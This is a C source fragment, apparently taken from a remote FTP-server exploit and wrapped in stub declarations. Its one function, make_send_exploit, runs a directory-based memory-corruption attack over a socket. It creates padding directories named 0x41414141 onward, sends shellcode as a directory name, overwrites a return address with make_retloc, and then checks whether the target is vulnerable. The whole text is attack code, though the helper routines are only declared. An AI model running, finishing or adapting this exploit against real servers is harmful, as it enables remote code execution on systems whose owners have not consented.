
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;


 int FAD ;
 int GET_R ;
 scalar_t__ NRL ;
 scalar_t__ __exp_test ;
 scalar_t__ check_exp (int) ;
 int exit (int) ;
 int fprintf (int ,char*) ;
 scalar_t__ make_retloc (int,int,char*,int ) ;
 scalar_t__ mkd_cwd_f (int,int,char*,int) ;
 scalar_t__ send_shellcode (int,int,char*) ;
 int stderr ;
 int stdout ;
 int t_g ;

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
 char atk_bf[(GET_R)];
 switch(t_g)
 {
  case 0:
  case 1:
  case 2:
   fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));
   fprintf(stdout," [+] 02: make shell-code directory.\n");
   (int)send_shellcode(sock,d_type,(atk_bf));
   fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));
   fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));
   fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));
   fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));
   fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));
   fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));
   fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));
   fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));
   fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));
   fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));
   fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));
   fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));
   fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));
   (int)make_retloc(sock,type,(atk_bf),sh_addr);
   break;
  case 3:
  case 4:
  case 5:
  case 6:
  case 7:
  case 8:
   fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));
   fprintf(stdout," [+] 02: make shell-code directory.\n");
   (int)send_shellcode(sock,d_type,(atk_bf));
   fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
   (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));
   (int)make_retloc(sock,type,(atk_bf),sh_addr);
   break;
 }
 if(type&&__exp_test)
 {
  __exp_test=(NRL);
  if(((int)check_exp(sock))==(FAD))
  {
   fprintf(stderr," [-] This isn't vulnerable.\n\n");
   exit(FAD);
  }
 }
 return;
}
